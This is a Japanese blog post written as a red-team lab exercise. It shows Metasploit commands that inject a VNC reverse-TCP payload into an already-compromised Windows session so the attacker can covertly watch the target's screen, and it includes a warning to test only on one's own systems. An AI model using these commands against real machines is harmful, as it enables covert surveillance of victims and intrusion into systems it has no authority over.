とある親父の侵入実験【Empire:帝国の目?鷹の目?】

f:id:appleseedj073:20170503114540p:plain

今回は、とあるシナリオに基づいて実施します。

ここで取り上げる検証等を実施する際は、全て自分の管理している環境で検証してください。使い方、実施場所を誤ると法に触れて罰せられます。

 

f:id:appleseedj073:20171103023924j:plain

「レッドチームとしては、なんとしてもブルーチームの操作画面を覗き見たい!これまで利用した標的型攻撃で得たブルーチームとのバックドアを利用して画面を盗み出せ!」

 

という命令が出たのでやってみます。

途中までの手順に関しては前々回の「皇帝との共闘」と一緒なんで、その後から書きます。

ra66itblog.hateblo.jp

 

監視モジュール準備

f:id:appleseedj073:20170509153248p:plain

現在接続されているセッションにVNCモジュールを送り込んでやる。

 

 msf exploit(handler) > use post/windows/manage/payload_inject
 msf post(payload_inject) > set payload windows/vncinject/reverse_tcp
 payload => windows/vncinject/reverse_tcp
 msf post(payload_inject) > set LHOST 192.168.1.100
 LHOST => 192.168.1.100
 msf post(payload_inject) > set session 1
 session => 1
 msf post(payload_inject) > set handler true
 handler => true

f:id:appleseedj073:20170509155006p:plain

準備ができたら実行

 msf post(payload_inject) > exploit

f:id:appleseedj073:20170509155147p:plain

色々と流れると・・・

 

f:id:appleseedj073:20170509155410p:plain

こんな感じに標的PCとの間にVNCで接続することができる。

 

相手との間の回線速度にもよるけど、案外快適に盗み見することが可能になりますw

 

「これで、ブルーチームの動向を確認することができる!」